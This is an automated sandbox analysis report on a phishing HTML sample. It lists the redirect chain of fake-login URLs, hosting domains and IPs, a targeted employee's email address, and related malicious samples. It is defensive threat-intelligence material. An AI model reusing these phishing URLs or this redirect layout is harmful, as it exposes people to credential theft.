Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic			Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Masquerading3	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Ingress Tool Transfer1	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
5781525.html	17%	Virustotal		Browse
5781525.html	100%	Avira	HTML/Redirector.AN

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
writerly.ca	0%	Virustotal	Browse
kristenbakercoach.com	0%	Virustotal	Browse
esd.rwbdg.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=	100%	SlashNext	Fake Login Page type: Phishing & Social Engineering
http://esd.rwbdg.com/	0%	Avira URL Cloud	safe
http://esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=/	0%	Avira URL Cloud	safe
https://dns.google	0%	URL Reputation	safe
https://dns.google	0%	URL Reputation	safe
https://dns.google	0%	URL Reputation	safe
https://writerly.ca/#pheeke	0%	Avira URL Cloud	safe
https://www.eaqarat-iran.ir/wp-admin/js/eng/?email=pheeke%40esd.wa.govSign	0%	Avira URL Cloud	safe
https://kristenbakercoach.com/wp-admin/js/redir/?referrer=pheeke	0%	Avira URL Cloud	safe
https://www.eaqarat-iran.ir/wp-admin/js/eng/app/lib/img/favicon.ico	0%	Avira URL Cloud	safe
https://www.eaqarat-iran.ir/wp-admin/js/eng/app/nextlogin?csrftoken=MTYyMDg0OTE0NWQzZjE1NGExMzM1YTYz	0%	Avira URL Cloud	safe
http://esd.rwbdg.com/wild/api.php	0%	Avira URL Cloud	safe
http://rwbdg.com/u	0%	Avira URL Cloud	safe
http://esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=$	0%	Avira URL Cloud	safe
http://Esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=%22%20%2F%3E	0%	Avira URL Cloud	safe
http://esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=2:	0%	Avira URL Cloud	safe
https://kristenbakercoach.com/favicon.ico	0%	Avira URL Cloud	safe
https://www.eaqarat-iran.ir/	0%	Avira URL Cloud	safe
http://esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=2	0%	Avira URL Cloud	safe
https://writerly.ca	0%	Avira URL Cloud	safe
https://www.eaqarat-iran.ir/wp-admin/js/eng/?email=pheeke%40esd.wa.gov	0%	Avira URL Cloud	safe
https://www.eaqarat-iran.ir/wp-admin/js/eng/app/checkemail?email=pheeke	0%	Avira URL Cloud	safe
http://esd.rwbdg.com	0%	Avira URL Cloud	safe
https://kristenbakercoach.com	0%	Avira URL Cloud	safe
https://kristenbakercoach.com/wp-admin/js/redir/check.php4	0%	Avira URL Cloud	safe
https://www.eaqarat-iran.ir	0%	Avira URL Cloud	safe
https://kristenbakercoach.com/wp-admin/js/redir/check.php/	0%	Avira URL Cloud	safe
https://kristenbakercoach.com/	0%	Avira URL Cloud	safe
https://www.eaqarat-iran.ir/wp-admin/js/eng/app/index?email=pheeke	0%	Avira URL Cloud	safe
http://esd.rwbdg.com/favicon.ico	0%	Avira URL Cloud	safe
https://kristenbakercoach.com/wp-admin/js/redir/?csrftoken=MTYyMDg0OTEzMWQzZjE1NGExMzM1YTYzODE1ZGQ3O	0%	Avira URL Cloud	safe
https://kristenbakercoach.comh	0%	Avira URL Cloud	safe
https://www.eaqarat-iran.ir/wp-admin/js/eng/app/lib/img/favicon.ico-	0%	Avira URL Cloud	safe
https://kristenbakercoach.com/wp-admin/js/redir/check.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
writerly.ca	172.67.150.89	true	false	0%, Virustotal, Browse	unknown
kristenbakercoach.com	192.254.185.127	true	false	0%, Virustotal, Browse	unknown
i0.wp.com	192.0.77.2	true	false		high
googlehosted.l.googleusercontent.com	142.250.185.65	true	false		high
esd.rwbdg.com	103.120.64.61	true	false	0%, Virustotal, Browse	unknown
eaqarat-iran.ir	5.144.130.32	true	false		unknown
clients2.googleusercontent.com	unknown	unknown	false		high
code.jquery.com	unknown	unknown	false		high
www.eaqarat-iran.ir	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://esd.rwbdg.com/	false	Avira URL Cloud: safe	unknown
http://esd.rwbdg.com/wild/api.php	false	Avira URL Cloud: safe	unknown
http://esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=	true	SlashNext: Fake Login Page type: Phishing & Social Engineering	unknown
https://kristenbakercoach.com/wp-admin/js/redir/?csrftoken=MTYyMDg0OTEzMWQzZjE1NGExMzM1YTYzODE1ZGQ3OGIxZWFkM2UxMWVkOWE0MWJiMDIwOWIyZTg4OGIwYjc5MGQ0ZWUyNDk5YzUyZmJiNGNjYw==	true		unknown
https://www.eaqarat-iran.ir/wp-admin/js/eng/app/nextlogin?csrftoken=MTYyMDg0OTE0NWQzZjE1NGExMzM1YTYzODE1ZGQ3OGIxZWFkM2UxMWVkOWE0MWJiMDJjNzcxMzM4YzdmNDhhY2QyNjA4N2E3OGU2ZDQ3OGQyNg==&email=pheeke@esd.wa.gov	true		unknown
http://esd.rwbdg.com/favicon.ico	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=/	History-journal.0.dr	true	Avira URL Cloud: safe	unknown
https://a.nel.cloudflare.com/report?s=ppHr7A2wLF5kAcE6y%2BVpsyCo9aMygCPKYaC9CDSC%2BOjgJWlpB82XDV9HuT	Reporting and NEL.1.dr	false		high
https://dns.google	8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr, a272768a-2d2b-447d-9f4d-ad5da35b066d.tmp.1.dr, 08d7be13-d743-4068-aaec-c768e3510e7b.tmp.1.dr, 7a860c75-6872-43b8-94de-e9bbc76d61a5.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://writerly.ca/#pheeke	History-journal.0.dr, Favicons-journal.0.dr	false	Avira URL Cloud: safe	unknown
https://www.eaqarat-iran.ir/wp-admin/js/eng/?email=pheeke%40esd.wa.govSign	History.0.dr	false	Avira URL Cloud: safe	unknown
https://kristenbakercoach.com/wp-admin/js/redir/?referrer=pheeke	Favicons-journal.0.dr, History.0.dr	false	Avira URL Cloud: safe	unknown
https://www.eaqarat-iran.ir/wp-admin/js/eng/app/lib/img/favicon.ico	Favicons.0.dr	false	Avira URL Cloud: safe	unknown
https://www.eaqarat-iran.ir/wp-admin/js/eng/app/nextlogin?csrftoken=MTYyMDg0OTE0NWQzZjE1NGExMzM1YTYz	History.0.dr	false	Avira URL Cloud: safe	unknown
http://rwbdg.com/u	e222f00a6abb9a7f_0.0.dr	false	Avira URL Cloud: safe	unknown
http://esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=$	Current Session.0.dr	true	Avira URL Cloud: safe	unknown
http://Esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=%22%20%2F%3E	5781525.html	false	Avira URL Cloud: safe	unknown
https://code.jquery.com	8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr	false		high
http://esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=2:	History Provider Cache.0.dr	true	Avira URL Cloud: safe	unknown
https://kristenbakercoach.com/favicon.ico	Favicons-journal.0.dr	false	Avira URL Cloud: safe	unknown
https://www.eaqarat-iran.ir/	Network Action Predictor-journal.0.dr	false	Avira URL Cloud: safe	unknown
http://esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=2	History Provider Cache.0.dr	true	Avira URL Cloud: safe	unknown
https://writerly.ca	Current Session.0.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://www.eaqarat-iran.ir/wp-admin/js/eng/?email=pheeke%40esd.wa.gov	Current Session.0.dr	false	Avira URL Cloud: safe	unknown
https://www.eaqarat-iran.ir/wp-admin/js/eng/app/checkemail?email=pheeke	History.0.dr	false	Avira URL Cloud: safe	unknown
http://esd.rwbdg.com	Current Session.0.dr	false	Avira URL Cloud: safe	unknown
https://kristenbakercoach.com	000003.log6.0.dr	false	Avira URL Cloud: safe	unknown
https://kristenbakercoach.com/wp-admin/js/redir/check.php4	Current Session.0.dr	false	Avira URL Cloud: safe	unknown
https://www.eaqarat-iran.ir	8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://kristenbakercoach.com/wp-admin/js/redir/check.php/	History.0.dr	false	Avira URL Cloud: safe	unknown
https://code.jquery.com/jquery-3.5.1.js	e222f00a6abb9a7f_0.0.dr	false		high
https://kristenbakercoach.com/	91be9c6b8d3150fe_0.0.dr	false	Avira URL Cloud: safe	unknown
https://www.eaqarat-iran.ir/wp-admin/js/eng/app/index?email=pheeke	History.0.dr	false	Avira URL Cloud: safe	unknown
https://clients2.googleusercontent.com	8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr, 7a860c75-6872-43b8-94de-e9bbc76d61a5.tmp.1.dr	false		high
http://esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=	Current Session.0.dr	true	SlashNext: Fake Login Page type: Phishing & Social Engineering	unknown
https://i0.wp.com	8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr	false		high
https://kristenbakercoach.com/wp-admin/js/redir/?csrftoken=MTYyMDg0OTEzMWQzZjE1NGExMzM1YTYzODE1ZGQ3O	Current Session.0.dr, Favicons-journal.0.dr, History.0.dr	false	Avira URL Cloud: safe	unknown
https://kristenbakercoach.comh	Current Session.0.dr	false	Avira URL Cloud: safe	unknown
https://feedback.googleusercontent.com	manifest.json0.0.dr	false		high
https://www.eaqarat-iran.ir/wp-admin/js/eng/app/lib/img/favicon.ico-	Favicons.0.dr	false	Avira URL Cloud: safe	unknown
https://kristenbakercoach.com/wp-admin/js/redir/check.php	Current Session.0.dr	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
103.120.64.61	esd.rwbdg.com	Indonesia	137373	IDNIC-SUITEN-AS-IDPTSUITENINOVASISUKSESID	false
5.144.130.32	eaqarat-iran.ir	Iran (ISLAMIC Republic Of)	59441	HOSTIRAN-NETWORKIR	false
142.250.185.65	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
172.67.150.89	writerly.ca	United States	13335	CLOUDFLARENETUS	false
192.0.77.2	i0.wp.com	United States	2635	AUTOMATTICUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
192.254.185.127	kristenbakercoach.com	United States	46606	UNIFIEDLAYER-AS-1US	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	412711
Start date:	12.05.2021
Start time:	21:51:15
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 21s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	5781525.html
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.winHTML@46/250@8/9
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .html
Warnings:	Show All Excluded IPs from analysis (whitelisted): 20.50.102.62, 104.80.21.45, 52.147.198.201, 104.43.139.144, 184.30.25.143, 142.250.185.78, 142.250.185.206, 216.58.212.173, 142.250.184.195, 95.168.222.144, 34.104.35.123, 69.16.175.42, 69.16.175.10, 2.20.142.209, 2.20.143.16, 95.168.222.76, 142.250.185.106, 142.250.185.138, 142.250.185.170, 142.250.185.202, 142.250.185.234, 142.250.181.234, 216.58.212.170, 142.250.74.202, 142.250.186.42, 142.250.186.74, 142.250.186.106, 142.250.186.138, 142.250.186.170, 142.250.184.202, 142.250.184.234, 172.217.18.106, 142.250.184.196, 172.217.16.131, 142.250.185.227, 23.57.80.111, 20.49.157.6, 92.122.213.247, 92.122.213.194, 142.250.185.99, 84.53.167.113, 2.17.179.193, 20.54.26.129, 95.168.222.77, 20.82.210.154, 95.168.222.142, 52.155.217.156 TCP Packets have been reduced to 100 Created / dropped Files have been reduced to 100 Excluded domains from analysis (whitelisted): gstaticadssl.l.google.com, cds.s5x3j6q5.hwcdn.net, clientservices.googleapis.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, cdn.onenote.net.edgekey.net, r2---sn-n02xgoxufvg3-2gbl.gvt1.com, r3---sn-n02xgoxufvg3-2gbs.gvt1.com, clients2.google.com, wildcard.weather.microsoft.com.edgekey.net, audownload.windowsupdate.nsatc.net, update.googleapis.com, www.google.com, watson.telemetry.microsoft.com, www.gstatic.com, au-bg-shim.trafficmanager.net, r2.sn-n02xgoxufvg3-2gbl.gvt1.com, fs.microsoft.com, content-autofill.googleapis.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, r5.sn-n02xgoxufvg3-2gbs.gvt1.com, ris-prod.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, r1.sn-n02xgoxufvg3-2gbl.gvt1.com, www.googleapis.com, storeedgefd.dsx.mp.microsoft.com.edgekey.net, ris.api.iris.microsoft.com, edgedl.me.gvt1.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e1553.dspg.akamaiedge.net, clients.l.google.com, storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, r1---sn-n02xgoxufvg3-2gbl.gvt1.com, store-images.s-microsoft.com-c.edgekey.net, r5---sn-n02xgoxufvg3-2gbs.gvt1.com, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, r3.sn-n02xgoxufvg3-2gbs.gvt1.com, redirector.gvt1.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, storeedgefd.dsx.mp.microsoft.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, accounts.google.com, fonts.gstatic.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcoleus16.cloudapp.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtQueryVolumeInformationFile calls found. Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:52:07	API Interceptor	1x Sleep call for process: chrome.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.120.64.61	5781525.html	Get hash	malicious	Browse	esd.rwbdg.com/favicon.ico
5.144.130.32	SecuriteInfo.com.Heur.17656.xls	Get hash	malicious	Browse	civil-group.ir/rvnhdtkyxgu/44266.7018792824.dat
	SecuriteInfo.com.Heur.17656.xls	Get hash	malicious	Browse	civil-group.ir/rvnhdtkyxgu/44266.6969873843.dat
	53payment_paninbank.exe	Get hash	malicious	Browse	kungfuafz.ir/kay/pony/shit.exe
172.67.150.89	5781525.html	Get hash	malicious	Browse
192.0.77.2	http://homeschoolingteen.com	Get hash	malicious	Browse	i0.wp.com/homeschoolingteen.com/wp-content/uploads/2016/06/AdvertiseHere467x60new.png
	http://tftpd32.jounin.net	Get hash	malicious	Browse	i1.wp.com/reboot.pro/public/style_images/metro/profile/default_large.png
	http://tftpd32.jounin.net/tftpd32_download.html	Get hash	malicious	Browse	i1.wp.com/reboot.pro/public/style_images/metro/profile/default_large.png
	Upgrade Procedure NCS55A2x V0.4.docx	Get hash	malicious	Browse	i1.wp.com/reboot.pro/public/style_images/metro/profile/default_large.png
	Upgrade Procedure NCS55A2x V0.4.docx	Get hash	malicious	Browse	i1.wp.com/reboot.pro/public/style_images/metro/profile/default_large.png
	http://iamanonymous.com/operations	Get hash	malicious	Browse	i0.wp.com/wp_user_avatar
	http://www.onesite.com.au	Get hash	malicious	Browse	i2.wp.com/www.onesite.com.au/wp-content/plugins/easy-testimonials/include/css/mystery_man.png
	http://theantimedia.com/	Get hash	malicious	Browse	i0.wp.com/theantimedia.org/wp-content/uploads/2017/01/profile_image.png
	http://www.hks-hukkers.net/index.php	Get hash	malicious	Browse	i1.wp.com/www.hks-hukkers.net/forum/public/style_images/surface_1_/profile/default_large.png
	http://lambanh365.com/cach-lam/cach-lam-nuoc-sot-banh-trang-tron/	Get hash	malicious	Browse	i1.wp.com/lambanh365.com/wp-content/themes/food-cook/images/gravatar.png
	http://www.momslife.com.ua/detskij-prazdnik-strana-komfortlyandiya-v-zhk-komfort-taun-nash-otzyv	Get hash	malicious	Browse	i0.wp.com/www.momslife.com.ua/images/mother-comment.png

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
kristenbakercoach.com	5781525.html	Get hash	malicious	Browse	192.254.185.127
writerly.ca	5781525.html	Get hash	malicious	Browse	172.67.150.89
i0.wp.com	5781525.html	Get hash	malicious	Browse	192.0.77.2
	Acunetix Premium v13.0.201112128 Activation Tool.exe	Get hash	malicious	Browse	192.0.77.2
	http://homeschoolingteen.com	Get hash	malicious	Browse	192.0.77.2
	http://www.afcogecodata.com.demikeutuhan.com/?tty=(rick.cameron@cogecodata.com)	Get hash	malicious	Browse	192.0.77.2
	http://wwmyetz.tamilweb.org	Get hash	malicious	Browse	192.0.77.2
	http://pohxoybi.whatisartdetroit.com/83b7fac6a4	Get hash	malicious	Browse	192.0.77.2
	http://pohxoybi.whatisartdetroit.com	Get hash	malicious	Browse	192.0.77.2
	Acunetix Premium v13.0.200930102 Activation Tool.exe	Get hash	malicious	Browse	192.0.77.2
	http://wfdzrnqwms.raquelyounglove.org/f10382%0A	Get hash	malicious	Browse	192.0.77.2
	http://slmiefp.bg-freebsd.org/7529d8dd5a%0A	Get hash	malicious	Browse	192.0.77.2
	http://ambihacks.org	Get hash	malicious	Browse	192.0.77.2
	http://admleaders.org	Get hash	malicious	Browse	192.0.77.2
	http://coinsblog.ws/	Get hash	malicious	Browse	192.0.77.2
	https://protect-eu.mimecast.com/s/nRL6C919Ncx696osOCjei?domain=smt-ab.com/	Get hash	malicious	Browse	192.0.77.2
	http://pfasdd.fr/abige/	Get hash	malicious	Browse	192.0.77.2
	2svozs0lnii.exe	Get hash	malicious	Browse	192.0.77.2
	http://fcdp.es/es/fundacion-canaria-para-el-desarrollo-de-la-pintura	Get hash	malicious	Browse	192.0.77.2
	https://www.ampases.com	Get hash	malicious	Browse	192.0.77.2
	http://www.ampases.com	Get hash	malicious	Browse	192.0.77.2
	http://41.33.13.26	Get hash	malicious	Browse	192.0.77.2
esd.rwbdg.com	5781525.html	Get hash	malicious	Browse	103.120.64.61

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
IDNIC-SUITEN-AS-IDPTSUITENINOVASISUKSESID	5781525.html	Get hash	malicious	Browse	103.120.64.61
CLOUDFLARENETUS	50eba5e3_by_Libranalysis.dll	Get hash	malicious	Browse	104.20.184.68
	6f61bc36_by_Libranalysis.dll	Get hash	malicious	Browse	104.20.185.68
	50eba5e3_by_Libranalysis.dll	Get hash	malicious	Browse	104.20.184.68
	5781525.html	Get hash	malicious	Browse	172.67.150.89
	6f61bc36_by_Libranalysis.dll	Get hash	malicious	Browse	104.20.184.68
	7e718f4b_by_Libranalysis.exe	Get hash	malicious	Browse	172.67.145.48
	1ChCpaSGY7.dll	Get hash	malicious	Browse	104.20.184.68
	1cec9342_by_Libranalysis.exe	Get hash	malicious	Browse	23.227.38.74
	M7LEWK86J8.exe	Get hash	malicious	Browse	104.21.13.168
	Product specification.xlsx	Get hash	malicious	Browse	172.67.171.184
	595e3339_by_Libranalysis.dll	Get hash	malicious	Browse	172.67.156.7
	7+ Taskbar Tweaker.exe	Get hash	malicious	Browse	172.67.151.27
	7+ Taskbar Tweaker.exe	Get hash	malicious	Browse	104.21.0.149
	GmCEpa2M7R.dll	Get hash	malicious	Browse	104.20.185.68
	350969bc_by_Libranalysis.exe	Get hash	malicious	Browse	23.227.38.74
	7bYDInO.rtf	Get hash	malicious	Browse	104.16.18.94
	Invoice...exe	Get hash	malicious	Browse	172.67.188.154
	Tek_multiloader_5.exe	Get hash	malicious	Browse	162.159.133.233
	PO 367628usa.exe	Get hash	malicious	Browse	66.235.200.147
	Statement of Account April-2021.exe	Get hash	malicious	Browse	104.21.19.200
AUTOMATTICUS	5781525.html	Get hash	malicious	Browse	192.0.77.2
	350969bc_by_Libranalysis.exe	Get hash	malicious	Browse	192.0.78.24
	Purchase Inquiry 11.05.2021.exe	Get hash	malicious	Browse	192.0.78.24
	DELL CORE.xlsx	Get hash	malicious	Browse	192.0.79.33
	DELL CORE.xlsx	Get hash	malicious	Browse	192.0.79.33
	e9777bb4_by_Libranalysis.exe	Get hash	malicious	Browse	192.0.78.24
	PROFORMA INVOICE210505133444.xlsx	Get hash	malicious	Browse	192.0.78.24
	TT.exe	Get hash	malicious	Browse	192.0.78.24
	08917506_by_Libranalysis.exe	Get hash	malicious	Browse	192.0.78.24
	4GGwmv0AJm.exe	Get hash	malicious	Browse	192.0.78.25
	c647b2da_by_Libranalysis.exe	Get hash	malicious	Browse	192.0.78.12
	0d69e4f6_by_Libranalysis.xls	Get hash	malicious	Browse	192.0.78.25
	wMqdemYyHm.exe	Get hash	malicious	Browse	192.0.78.25
	MSUtbPjUGib2dvd.exe	Get hash	malicious	Browse	192.0.78.25
	PROFORMA INVOICE-INV393456434.pdf.exe	Get hash	malicious	Browse	192.0.78.25
	agnesng@hanglung.comOnedrive.html	Get hash	malicious	Browse	192.0.77.2
	PO_29_00412.exe	Get hash	malicious	Browse	192.0.78.25
	Enrollment_Benefits-2022.docx	Get hash	malicious	Browse	192.0.66.2
	Enrollment_Benefits-2022.docx	Get hash	malicious	Browse	192.0.66.2
	DVO100024000.doc	Get hash	malicious	Browse	192.0.78.24
HOSTIRAN-NETWORKIR	5781525.html	Get hash	malicious	Browse	5.144.130.32
	export of purchase order 7484876.xlsm	Get hash	malicious	Browse	5.144.130.34
	XM7eDjwHqp.xlsm	Get hash	malicious	Browse	5.144.130.34
	QTFsui5pLN.xlsm	Get hash	malicious	Browse	5.144.130.34
	15j1TCnOiA.xlsm	Get hash	malicious	Browse	5.144.130.34
	SecuriteInfo.com.VBA.Amphitryon.3398.21438.xlsm	Get hash	malicious	Browse	5.144.130.34
	SecuriteInfo.com.VBA.Amphitryon.3398.21438.xlsm	Get hash	malicious	Browse	5.144.130.34
	GxRBjQa5k0.exe	Get hash	malicious	Browse	5.144.130.35
	SecuriteInfo.com.Heur.17656.xls	Get hash	malicious	Browse	5.144.130.32
	SecuriteInfo.com.Heur.17656.xls	Get hash	malicious	Browse	5.144.130.32
	RFQ_CR202102020 - MR2021013057_pdf.exe	Get hash	malicious	Browse	5.144.130.34
	DHL SHIPPING AND TRACKING DOCUMENT_PDF.exe	Get hash	malicious	Browse	5.144.130.34
	DHL SHIPPING AND TRACKING DOCUMENT_PDF_1.exe	Get hash	malicious	Browse	5.144.130.34
	e8fRV62ajB.exe	Get hash	malicious	Browse	5.144.130.34
	Order CIE-31-08-2020 (Enq 63-29-2 ABC)_pdf.exe	Get hash	malicious	Browse	5.144.130.34
	DHL_AWB #1008936572891_pdf.exe	Get hash	malicious	Browse	5.144.130.34
	RFQ ICT-200068-MKE-AL ESTISHARI_pdf.exe	Get hash	malicious	Browse	5.144.130.34
	DHL_AWB #1008936572891_pdf.exe	Get hash	malicious	Browse	5.144.130.34
	DHL_AWB #1008936572891_pdf.exe	Get hash	malicious	Browse	5.144.130.34
	DHL_AWB #1008936572891_pdf.exe	Get hash	malicious	Browse	5.144.130.34

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
b32309a26951912be7dba376398abc3b	5781525.html	Get hash	malicious	Browse	5.144.130.32
	INV-Receipt.html	Get hash	malicious	Browse	5.144.130.32
	ATT82166.HTM	Get hash	malicious	Browse	5.144.130.32
	#Ud83d#Udd7b Missed Playback Recording.wav - 1424592794.htm	Get hash	malicious	Browse	5.144.130.32
	Remittance Copy 550469 - jessica.taylor@granburyisd.org.html	Get hash	malicious	Browse	5.144.130.32
	Wave Browser_ajpko2tb_.exe	Get hash	malicious	Browse	5.144.130.32
	Open_Invoice_and_statements.htm	Get hash	malicious	Browse	5.144.130.32
	Wave Browser_cg5vc6cx_.exe	Get hash	malicious	Browse	5.144.130.32
	V___oic______ePl_a_ybac___k for___ ___Bsakhitab______ ______Varde.htm	Get hash	malicious	Browse	5.144.130.32
